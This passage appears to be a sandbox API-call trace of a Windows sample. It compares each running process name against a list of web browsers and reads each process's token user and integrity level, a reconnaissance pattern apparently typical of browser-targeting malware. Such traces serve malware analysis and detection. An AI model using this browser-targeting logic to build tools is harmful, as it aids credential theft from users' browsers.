returned 1 [0239.362] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0239.362] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0239.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0239.362] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.362] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.362] GetLastError () returned 0x7a [0239.363] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.363] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.363] CloseHandle (hObject=0xb8) returned 1 [0239.363] CloseHandle (hObject=0xb4) returned 1 [0239.363] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.363] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.363] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.363] GetLastError () returned 0x7a [0239.363] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.364] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.364] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.364] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0239.364] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0239.364] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0239.364] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0239.364] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0239.364] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0239.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0239.364] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.364] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.365] GetLastError () returned 0x7a [0239.365] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.365] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.365] CloseHandle (hObject=0xb8) returned 1 [0239.365] CloseHandle (hObject=0xb4) returned 1 [0239.365] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.365] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.365] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.366] GetLastError () returned 0x7a [0239.366] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.366] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.366] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.366] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0239.366] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0239.366] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0239.366] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0239.366] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0239.366] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0239.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0239.367] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.367] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.367] GetLastError () returned 0x7a [0239.367] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.367] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.367] CloseHandle (hObject=0xb8) returned 1 [0239.367] CloseHandle (hObject=0xb4) returned 1 [0239.367] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.367] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.368] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.368] GetLastError () returned 0x7a [0239.368] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.368] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.368] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.368] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0239.368] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0239.368] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0239.368] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0239.368] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0239.369] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0239.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0239.369] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.369] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.369] GetLastError () returned 0x7a [0239.369] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.369] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.369] CloseHandle (hObject=0xb8) returned 1 [0239.369] CloseHandle (hObject=0xb4) returned 1 [0239.369] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.370] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.370] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.370] GetLastError () returned 0x7a [0239.370] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.370] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.370] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.370] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0239.370] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0239.370] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0239.371] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0239.371] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0239.371] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0239.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0239.371] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.371] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.371] GetLastError () returned 0x7a [0239.371] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.371] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.371] CloseHandle (hObject=0xb8) returned 1 [0239.372] CloseHandle (hObject=0xb4) returned 1 [0239.372] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.372] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.372] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.372] GetLastError () returned 0x7a [0239.372] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.372] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.372] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.372] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0239.372] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0239.372] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0239.372] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0239.372] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0239.373] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0239.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0239.373] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.373] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.373] GetLastError () returned 0x7a [0239.373] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.373] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.373] CloseHandle (hObject=0xb8) returned 1 [0239.373] CloseHandle (hObject=0xb4) returned 1 [0239.373] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.373] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.373] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.373] GetLastError () returned 0x7a [0239.374] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.374] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.374] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.374] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0239.374] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0239.374] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0239.374] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0239.374] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0239.374] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0239.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0239.374] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.374] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.374] GetLastError () returned 0x7a [0239.374] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.375] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.375] CloseHandle (hObject=0xb8) returned 1 [0239.375] CloseHandle (hObject=0xb4) returned 1 [0239.375] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.375] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.375] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.375] GetLastError () returned 0x7a [0239.375] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.375] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.375] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.375] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0239.375] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0239.375] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0239.375] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0239.376] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0239.376] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0239.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0239.376] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.376] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.376] GetLastError () returned 0x7a [0239.376] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.376] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.376] CloseHandle (hObject=0xb8) returned 1 [0239.376] CloseHandle (hObject=0xb4) returned 1 [0239.376] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.376] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.376] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.377] GetLastError () returned 0x7a [0239.377] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.377] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.377] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.377] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0239.377] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0239.377] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0239.377] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0239.377] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0239.377] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0239.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xb4 [0239.377] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.377] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.377] GetLastError () returned 0x7a [0239.377] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.377] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.377] CloseHandle (hObject=0xb8) returned 1 [0239.377] CloseHandle (hObject=0xb4) returned 1 [0239.378] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.378] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.378] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.378] GetLastError () returned 0x7a [0239.378] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.378] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.378] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.378] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0239.378] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0239.378] lstrcmpiW 